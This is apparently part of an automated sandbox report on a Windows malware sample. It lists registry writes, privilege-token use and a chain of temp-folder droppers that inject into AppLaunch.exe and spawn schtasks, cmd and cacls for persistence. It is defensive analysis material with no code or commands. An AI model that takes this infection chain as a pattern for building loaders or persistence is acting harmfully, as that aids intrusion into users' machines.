Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cfa9043cff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 10469f1ce21bda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8f9ea21aff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 94db7e1aff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 941da930ff06da01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "404371501" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-946614337-2046421199-3397417319-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3kC15xy.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FAFE.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3328 wrote to memory of 3216 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F78F.exe
PID 3328 wrote to memory of 3216 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F78F.exe
PID 3328 wrote to memory of 3216 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F78F.exe
PID 3328 wrote to memory of 3484 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F899.exe
PID 3328 wrote to memory of 3484 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F899.exe
PID 3328 wrote to memory of 3484 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\F899.exe
PID 3216 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\F78F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3216 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\F78F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3216 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\F78F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe
PID 3328 wrote to memory of 1184 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3328 wrote to memory of 1184 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1304 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 1304 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 1304 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe
PID 3328 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FA41.exe
PID 3328 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FA41.exe
PID 3328 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FA41.exe
PID 4636 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 4636 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 4636 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe
PID 3328 wrote to memory of 5088 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FAFE.exe
PID 3328 wrote to memory of 5088 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FAFE.exe
PID 3328 wrote to memory of 5088 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FAFE.exe
PID 1740 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 1740 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 1740 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe
PID 3532 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 3532 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 3532 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe
PID 3328 wrote to memory of 4972 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FC66.exe
PID 3328 wrote to memory of 4972 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FC66.exe
PID 3328 wrote to memory of 4972 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FC66.exe
PID 4972 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\FC66.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4972 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\FC66.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4972 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\FC66.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2580 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2580 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2580 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2580 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 2580 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 2580 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3608 wrote to memory of 1504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3608 wrote to memory of 1504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3608 wrote to memory of 1504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4760 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3532 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe
PID 3532 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe
PID 3532 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe
PID 3608 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3608 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3608 wrote to memory of 912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
